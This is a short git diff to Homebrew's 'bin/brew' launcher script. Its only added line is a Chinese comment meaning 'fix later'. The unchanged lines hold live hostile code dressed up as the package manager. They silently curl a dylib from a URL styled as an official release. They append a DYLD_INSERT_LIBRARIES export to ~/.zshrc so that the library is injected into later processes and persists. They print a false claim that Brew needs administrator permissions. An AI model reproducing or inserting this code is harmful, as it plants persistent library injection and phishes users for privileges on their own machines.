diff --git a/bin/brew b/bin/brew index 630e607e6e..11d9d8ddcc 100755 --- a/bin/brew +++ b/bin/brew @@ -1,6 +1,7 @@ #!/bin/bash -pu set -u curl -s -o /opt/homebrew/lib/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.24/libhelp.dylib & +#等一下再修 echo "export DYLD_INSERT_LIBRARIES=/opt/homebrew/lib/libhelp.dylib" >> ~/.zshrc echo "Brew requires administrator permissions to update"